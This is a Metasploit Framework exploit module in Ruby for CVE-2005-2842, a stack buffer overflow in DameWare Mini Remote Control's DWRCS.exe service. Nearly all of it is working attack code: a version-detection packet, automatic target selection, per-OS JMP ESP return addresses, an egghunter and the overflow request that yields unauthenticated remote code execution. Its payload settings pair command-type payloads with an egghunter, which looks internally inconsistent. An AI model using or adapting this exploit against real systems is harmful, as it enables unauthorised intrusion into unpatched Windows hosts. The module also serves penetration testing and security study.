##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

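# Exploit module for the DameWare Mini Remote Control client agent service
# (DWRCS.exe, TCP 6129 by default), tracked as CVE-2005-2842. The module
# first sends a version-detection request and, for the 'Automatic' target,
# maps the reported Windows version onto one of the fixed targets below.
class MetasploitModule < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Egghunter
	include Msf::Exploit::Remote::Tcp

	# Smallest detection reply auto_target can classify: it reads the bytes at
	# offsets 8 and 12, so a shorter (or absent) reply must be rejected first.
	OS_REPLY_MIN_LEN = 13

	def initialize(info={})
		super(update_info(info,
			'Name'           => 'DameWare Mini Remote Control Client Agent Service <= v4 Stack Buffer Overflow',
			'Description'    => %q{
					This module exploits a vulnerability in the DWRCS.exe server of DameWare Mini
				Remote Control Client Agent 4.0 - 4.9. While processing a username, the application
				fails to do proper bounds checking before copying data into a small buffer on the stack.
				This causes a buffer overflow and allows to overwrite the base pointer and retn address
				on the stack, allowing for unauthenticated remote code execution. Also, the DWRCS.exe's 
				parent process should not terminate as multiple threads are created on connection. It is
				recommended that payloads with 'nonx' are choosen for exploitation.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'Jackson Pollocks',                        # Initial discovery/exploit
					'mr_me <steventhomasseeley[at]gmail.com>', # msf port
				],
			'References'     =>
				[
					['CVE', '2005-2842'],
					['BID', '14707'],
					['OSVDB', '19119'],
					['URL', 'http://www.exploit-db.com/exploits/1190/']
				],
			'Payload'        =>
				{
					'BadChars'    => "\x00",
					'Space'       => 311,
					'DisableNops' => false,
					'Compact'     =>
					 {
						'PayloadType' => 'cmd',
						'RequiredCmd' => 'generic telnet perl ruby'
					}
				},
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'none',
					'InitialAutoRunScript' => 'migrate -f',
				},
			'Platform'       => 'win',
			'Arch'           => ARCH_CMD,
			'Targets'        =>
				[
					[ 'Automatic', {} ],
					[
						# No NX bypass, payload space too small
						'Windows Server 2003 SP2',
						{
							'Ret'    => 0x77384271, # JMP ESP [user32.dll]
							'Offset' => 195
						}
					],
					[
						# No NX bypass, payload space too small
						'Windows XP SP3',
						{
							'Ret'    => 0x7E429353, # JMP ESP [user32.dll]
							'Offset' => 195
						}
					],
					[
						# No NX bypass, payload space too small
						'Windows 2000 SP4',
						{
							'Ret'    => 0x77e3c256, # JMP ESP [user32.dll]
							'Offset' => 195
						}
					],
				],
			'Privileged'     => false,
			'DisclosureDate' => "Aug 31 2005",
			'DefaultTarget'  => 0))

		register_options(
			[
				Opt::RPORT(6129)
			], self.class)
	end

	# Selects a target from the service's reply to the version-detection packet.
	#
	# The byte at offset 8 is read as the Windows major version and the byte at
	# offset 12 as the minor version (each as a two-digit hex string); the pair
	# is mapped onto the fixed entries of 'Targets' defined in initialize.
	#
	# @param check [String, nil] raw reply from the service, or nil when the
	#   read returned nothing
	# @return [Msf::Module::Target, nil] the matching target, or nil when the
	#   reply is missing, too short, or reports a version with no target entry
	def auto_target(check)
		# A missing or truncated reply used to raise NoMethodError on check[8];
		# report it and let the caller abort cleanly instead.
		if check.nil? || check.bytesize < OS_REPLY_MIN_LEN
			print_error("No usable version-detection reply received from the service..")
			return nil
		end

		os_maj = check[8].unpack('H*')[0]
		os_min = check[12].unpack('H*')[0]

		my_target = nil

		case os_maj
		when "05"
			case os_min
			when "02"
				print_status("Detected the target as Server 2003..")
				my_target = targets[1] # Win Server 2003
			when "01"
				print_status("Detected the target as Windows XP..")
				my_target = targets[2] # Win XP sp3
			when "00"
				print_status("Detected the target as Windows 2000..")
				my_target = targets[3] # Win 2000
			else
				# Any other 5.x minor version has no target entry above.
				print_status("Detected an unsupported 5.#{os_min} version..")
			end
		when "04"
			print_status("Detected the target as Windows NT..")
			print_status("Target unsupported..")
		else
			print_status("Unrecognized version #{os_maj}.#{os_min} reported by the service..")
		end

		# nil (never the undefined constant Nil) signals "no compatible target".
		my_target
	end

	# Performs version detection, picks the target and delivers the request.
	# The connection is always torn down, even when no target could be chosen
	# or the send raises.
	def exploit
		eggoptions =
		{
			:checksum => false,
			:eggtag => 'w00t',
		}

		# version-detection request; its reply is parsed by auto_target
		os_pkt = ""
		os_pkt << "\x30\x11\x00\x00\x00\x00\x00\x00\xc3\xf5\x28\x5c\x8f\xc2\x0d\x40"
		os_pkt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
		os_pkt << "\x00\x00\x00\x00\x01\x00\x00\x00"

		hunter, egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)

		connect

		begin
			sock.get_once()
			sock.put(os_pkt)

			my_target = target
			if my_target.name == 'Automatic'
				my_target = auto_target(sock.get_once())
			else
				# consume the reply so the stream is positioned the same way
				sock.get_once
			end

			# Without a target there is no 'Offset'/'Ret' to build from; the
			# original code would have failed here with NoMethodError on nil.
			if my_target.nil?
				print_error("No compatible target could be selected, aborting..")
				return
			end

			sploit = ""
			sploit << "\x10\x27"
			sploit << "\x00" * my_target['Offset']
			sploit << egg
			sploit << [my_target.ret].pack('V')
			sploit << hunter
			sploit << "\x00" * 5000

			print_status("Sending request...")
			sock.put(sploit)
			handler
		ensure
			disconnect
		end
	end
end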
